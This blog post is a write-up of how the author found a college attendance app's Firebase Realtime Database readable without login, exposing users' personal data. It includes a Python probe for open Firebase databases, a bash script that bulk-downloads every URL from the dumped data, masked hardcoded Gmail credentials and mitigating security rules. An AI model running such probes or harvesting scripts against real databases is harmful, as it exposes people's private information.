
How I found the database of the college App | Yoginth

It's Thursday afternoon and there is nothing interesting on YouTube, so I was hacking away at my own application, Gitote, in my text editor.

Then an idea came to me: what if I could increase my attendance percentage at my college? LOL!

Reconnaissance

I opened the XXXXXXX app (I don't want to reveal the app name), which is installed on my Android device, and peeked at my old attendance.

Nothing surprising there; this is just my regular check-up.

Static Analysis

Time to analyze what we have. Looking at AndroidManifest.xml, we can see that:

Next, I looked at the res/values/strings.xml file.

    <string name="firebase_database_url">https://******-e****.firebaseio.com</string>
    <string name="gcm_defaultSenderId">8***3163***5</string>
    <string name="google_api_key">AIzaS****f94c3-qh4W3*****cdRrbKui*****8</string>
    <string name="google_app_id">1:8873*****935:android:**5f597*****6691</string>
    <string name="google_crash_reporting_api_key">AI*****Vhf94c*-q**W3WOv*****rbKui*****8</string>
    <string name="google_storage_bucket">*******-e****.appspot.com</string>

Whoa! The IDs and keys for everything are hardcoded in this file, which shows how seriously they take security. (To be fair, these particular values are Firebase client configuration that ships inside every app that uses Firebase, so on their own they are identifiers rather than secrets; what matters is what an unauthenticated client is allowed to do with the database URL, and that is exactly what the next step checks.)

Moreover, we can see that they are using the Firebase Realtime Database. Let's see whether they configured its security rules correctly. I pasted https://********e**5*.firebaseio.com/.json into Chrome.

Whoa! Again, the entire database is visible to me! This is freaking unbelievable: their database is readable by anyone who knows the URL, with no login and no token required. I'm now able to view all the user info (name, avatar, id, device, email, phone number and some more credentials).

None of it is encrypted.
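The check described above, done from a script instead of a browser, as an added example that is not part of the original post: it pulls `firebase_database_url` out of a `strings.xml` dump, builds the REST URL with the real `?shallow=true` parameter (so a probe returns only the top-level keys instead of downloading the whole database), and classifies the reply. The `strings.xml` values and the two REST replies are constructed samples with dummy names; the replies are shaped like what `firebaseio.com` returns for a denied read (HTTP 401, `Permission denied`) and for an open one (HTTP 200 with data).

```python
"""Check whether a Firebase Realtime Database found in an APK is world-readable."""
import json
import sys
import xml.etree.ElementTree as ET
from typing import Optional
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Constructed sample of res/values/strings.xml with dummy values (not the real app's).
SAMPLE_STRINGS_XML = """<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="firebase_database_url">https://example-app-12345.firebaseio.com</string>
    <string name="google_api_key">AIzaSyDUMMY-dummy-dummy-dummy-dummy-dummyAA</string>
    <string name="google_storage_bucket">example-app-12345.appspot.com</string>
</resources>
"""

# Constructed REST replies, shaped like what firebaseio.com returns.
DENIED_REPLY = (401, '{\n  "error" : "Permission denied"\n}')
OPEN_REPLY = (200, '{"admins":true,"attendance":true,"users":true}')


def firebase_database_url(strings_xml: str) -> Optional[str]:
    """Pull the firebase_database_url string resource out of strings.xml."""
    root = ET.fromstring(strings_xml)
    for node in root.iter("string"):
        if node.get("name") == "firebase_database_url" and node.text:
            return node.text.strip()
    return None


def probe_url(db_url: str, path: str = "/", shallow: bool = True) -> str:
    """Build the REST URL for a path. shallow=true makes Firebase return only
    the top-level keys, so the probe does not pull the whole database."""
    clean = path.strip("/")
    url = db_url.rstrip("/") + ("/" + clean if clean else "") + "/.json"
    return url + "?shallow=true" if shallow else url


def classify_response(status: int, body: str) -> dict:
    """Map an HTTP status and body to a verdict about the database rules."""
    if status in (401, 403):
        return {"verdict": "denied", "keys": []}
    if status != 200:
        return {"verdict": f"unknown (HTTP {status})", "keys": []}
    data = json.loads(body)
    if data is None:  # readable, but nothing is stored at this path
        return {"verdict": "open (empty)", "keys": []}
    keys = sorted(data) if isinstance(data, dict) else []
    return {"verdict": "open", "keys": keys}


def probe(db_url: str, path: str = "/") -> dict:
    """Send one unauthenticated GET (no API key, no token) and classify the reply."""
    req = Request(probe_url(db_url, path), headers={"User-Agent": "rules-check"})
    try:
        with urlopen(req, timeout=10) as resp:
            return classify_response(resp.getcode(), resp.read().decode())
    except HTTPError as err:
        return classify_response(err.code, err.read().decode())


if __name__ == "__main__":
    # Offline demo on the constructed replies, then a live probe if a
    # strings.xml path is given as argv[1].
    for reply in (DENIED_REPLY, OPEN_REPLY):
        print(reply[0], classify_response(*reply))
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            url = firebase_database_url(fh.read())
        print(url, probe(url) if url else "no firebase_database_url found")
```

Run it with the path to the decompiled `res/values/strings.xml` to probe the real database; a verdict of `open` with a non-empty key list is the situation described in this post, and `denied` means the rules require authentication for that path (check a few child paths too, since rules can differ per path).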

    #!/bin/bash
    # Pull every URL out of the dumped database JSON ($1) and fetch it.
    # awk splits on double quotes, so every JSON string value that starts
    # with "http" (here: the avatar URLs) is printed on its own line.
    awk -F'"' '{ for (i = 1; i <= NF; i++) if ($i ~ /^http/) print $i }' "$1" |
    sort -u |
    while IFS= read -r url; do
        wget "$url"
    done

With this simple script, I downloaded all the available avatars.

    // Found in the decompiled app source: a Gmail address and password
    // hardcoded into the client's mail sender, so every user carries them.
    BackgroundMail.newBuilder(MailUs.this).withUsername("*******.*****@gmail.com").withPassword("******@*****347")

Ooooh! I found an admin's email address and password, possibly the ones for their Google Play Console account.

Mitigations
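Added example (not part of the original post): the Realtime Database rules that would have prevented this. A database is world-readable when its rules carry `".read": true` at the root (the setting Firebase offers as "test mode"). The ruleset below denies everything at the root and grants each signed-in user access to their own record only; rules in Firebase can only grant, never revoke, so a locked root with narrow grants beneath it is the safe shape. The `users` path and the `$uid` key layout are assumptions about how such an app stores its data, not taken from the app itself.

```json
{
  "rules": {
    ".read": false,
    ".write": false,
    "users": {
      "$uid": {
        ".read": "auth != null && auth.uid == $uid",
        ".write": "auth != null && auth.uid == $uid"
      }
    }
  }
}
```

After publishing these rules, an unauthenticated GET of `/.json` returns `Permission denied`, and a signed-in user can read `/users/<their uid>` but nobody else's record. Separately from the rules, the Gmail credentials have to be rotated and moved out of the client; no rule change helps once a secret is shipped inside the APK.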

If you like this article, feel free to follow me on Twitter.

There's still a lot more to come.